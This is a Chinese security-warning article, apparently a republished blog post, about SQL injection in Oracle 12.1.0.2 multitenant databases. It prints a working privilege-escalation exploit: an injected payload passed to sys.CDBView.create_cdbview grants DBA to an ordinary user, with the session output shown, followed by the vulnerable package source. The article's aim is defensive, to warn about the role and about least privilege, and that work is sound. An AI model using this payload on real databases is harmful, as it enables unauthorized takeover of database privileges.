【安全警告】Oracle 12c 多租户的SQL注入高危风险防范

在使用Oracle多租户选件时,由于Container容器和PDB融合共存,则权限控制必将更加重要,在之前的文章中我们提到,Oracle 12.2 的 lockdown profile就是为了实现PDB中更为全面的权限控制。

我们在2016年『比特币事件』中,总结了数据安全的十六大军规其中有一条也明确提到最小权限守则,而且要真正实现权限管理

SQL注入攻击的风险

我们来看看如果权限控制不当,可能遭遇到的数据库安全风险。根据最近披露的风险之一,通过SQL注入可能影响数据库的安全,以下问题影响到多租户的12.1.0.2.0最新版本。

假如我们在CDB中拥有一个普通用户,因为某种原因它申请和被授予了EXECUTE_CATALOG_ROLE的角色:

SQL> connect / as sysdba Connected. SQL> create user c##eygle identified by eygle; User created. SQL> grant execute_catalog_role,create session to c##eygle; Grant succeeded. SQL> select granted_role from user_role_privs; GRANTED_ROLE --------------------------------------------- EXECUTE_CATALOG_ROLE

我们看看这一角色可能由此深入所做出的尝试,经常讨论的SQL注入也就在这个知识范畴之中。

当以下一个系列的SQL被执行之后,一个普通用户获得了DBA的权限,如果这是在一个多租户的环境中,这个提权将是非常危险的:

SQL> connect c##eygle/eygle Connected. SQL> select granted_role from user_role_privs; GRANTED_ROLE ----------------------------------------------------- EXECUTE_CATALOG_ROLE SQL> exec sys.CDBView.create_cdbview(true,'ALL_POLICIES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','yh_view' ,' */ execute immediate ''grant dba to c##eygle''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); * ERROR at line 1: ORA-00905: missing keyword ORA-06512: at "SYS.CDBVIEW", line 58 ORA-06512: at line 1 SQL> select /*+WITH_PLSQL*/ * from ALL_POLICIES; X ------- 1 SQL> select granted_role from user_role_privs; GRANTED_ROLE ---------------------------- DBA EXECUTE_CATALOG_ROLE SQL> select banner from v$version; BANNER ---------------------------------------------------------------------------------------- Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production PL/SQL Release 12.1.0.2.0 - Production CORE 12.1.0.2.0 Production TNS for Linux: Version 12.1.0.2.0 - Production NLSRTL Version 12.1.0.2.0 - Production

当然作为资深的DBA来说,我们应当知道EXECUTE_CATALOG_ROLE这一角色权限是非常危险的,要严格控制这一权限的授予。这一注入,实际上是利用了 CDBView 包的校验漏洞,进行了注入提权。

sys.CDBView 的主要内容如下(在安装脚本中是明文的),风险来自于脚本内部的校验缺失:

create or replace package sys.CDBView as ---------------------------- -- PROCEDURES AND FUNCTIONS -- procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2, oldview_name IN varchar2, newview_name IN varchar2); end CDBView; / grant execute on sys.CDBView to execute_catalog_role / create or replace package body sys.CDBView is -- Create the cdb view -- private helper procedure to create the cdb view -- Note that quotes should not be added around owner, oldview_name and -- newview_name before create_cdbview is invoked since all three are used -- as literals to query dictionary views. procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2, oldview_name IN varchar2, newview_name IN varchar2) as sqlstmt varchar2(4000); col_name varchar2(128); comments varchar2(4000); col_type number; upper_owner varchar2(128); upper_oldview varchar2(128); quoted_owner varchar2(130); -- 2 more than size of owner quoted_oldview varchar2(130); -- 2 more than size of oldview_name quoted_newview varchar2(130); -- 2 more than size of newview_name cursor tblcommentscur is select c.comment$ from sys.obj$ o, sys.user$ u, sys.com$ c where o.name = upper_oldview and u.name = upper_owner and o.obj# = c.obj# and o.owner#=u.user# and o.type# = 4 and c.col# is null; cursor colcommentscur is select c.name, co.comment$, c.type# from sys.obj$ o, sys.col$ c, sys.user$ u, sys.com$ co where o.name = upper_oldview and u.name = upper_owner and o.owner# = u.user# and o.type# = 4 and o.obj# = c.obj# and c.obj# = co.obj# and c.intcol# = co.col# and bitand(c.property, 32) = 0; begin -- convert owner and view names to upper case upper_owner := upper(owner); upper_oldview := upper(oldview_name); quoted_owner := '"' || upper_owner || '"'; quoted_oldview := '"' || upper_oldview || '"'; quoted_newview := '"' || upper(newview_name) || '"'; -- create cdb view sqlstmt := 'CREATE OR REPLACE VIEW ' || quoted_owner || '.' || quoted_newview || ' CONTAINER_DATA AS SELECT * FROM CONTAINERS(' || quoted_owner || '.' || quoted_oldview || ')'; --dbms_output.put_line(sqlstmt); execute immediate sqlstmt; ...... end if; end loop; close colcommentscur; end; end CDBView; / show errors; /

安全风险无处不在,提高安全意识刻不容缓。

原文发布于微信公众号 - 数据和云(OraNews)

原文发表时间:2017-01-11

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏杨建荣的学习笔记

了解一下SQL Server

说实话,我在大学的时候用了下SQL Server,自从工作以来一直没有接触过SQL Sever,越是不接触越是排斥,也是不了解越是排斥,所以花点时间了解下自...

3195
来自专栏杨建荣的学习笔记

使用在线重定义重构亿级分区表(r10笔记第34天)

在我的印象中,一直以来都会收到一封报警邮件,之前分析过,排查过,最后发现是一个遗留问题,协调开发同学,停业务维护还是有一些难度,最后不了了之了,在今天又突然想起...

3738
来自专栏lgp20151222

JPA 的 CascadeType 属性 和 FetchType属性 和 各种映射关系

代码地址:https://gitee.com/a247292980/lgp20151222 

592
来自专栏happyJared

爬虫进阶:Scrapy抓取慕课网

  完整的爬虫流程大致是这样的:分析页面结构 -> 确定提取信息 -> 设计相应表结构 -> 编写爬虫脚本 -> 数据保存入库;入库可以选择mongo这样的文档...

1224
来自专栏SAP最佳业务实践

SAP最佳业务实践:半成品的计划与处理(234)-5成品销售发货

image.png VA02客户订单中的可用性检查和装运地点更改 此操作介绍一种如何在交货之前检查物料可用性的可能性。 客户库存中必须存在已交付的物料。 角色销...

2814
来自专栏杨建荣的学习笔记

awr性能问题排查第一篇(r3笔记第42天)

对于awr,里面涵盖的内容比较杂,有时候看报告的时候总是不知道该怎么下手。时间长了,可能会有一些阅读习惯或者心得。今天在看大师chris lawson的一篇博文...

2664
来自专栏杨建荣的学习笔记

一条简单的sql语句运行15天的原因分析(r5笔记第17天)

在测试环境中,可能一个测试库中会有几十上百套环境在运行,一般DBA不会去主动干涉测试环境中的一些使用细节,可能问题都是开发测试来反馈给DBA采取做一个被动的处理...

4005
来自专栏数据库新发现

Oracle数据恢复、数据库恢复、灾难恢复专题

原文链接:http://www.eygle.com/blog/special/oracle_recovery.html

993
来自专栏杨建荣的学习笔记

数据库负载急剧提高的应急处理(二) (r9笔记第55天)

对于之前碰到的一个数据库负载急剧提升的问题,做了应急处理之后,我们需要再冷静下来,来看看是哪些地方出现了问题,还需要哪些改进。 首先第一个问题就是为什么会突然负...

3194
来自专栏数据和云

【动手实践】Oracle 12.2 新特性:自动的列表分区创建

2017年来了,我们要启动新的学习征程了。在过去我们一直思考,什么样的内容能够更帮助大家了解和学习到有用的知识? 这个『动手实践』栏目就是这样一个改进和尝试吧,...

2706

扫码关注云+社区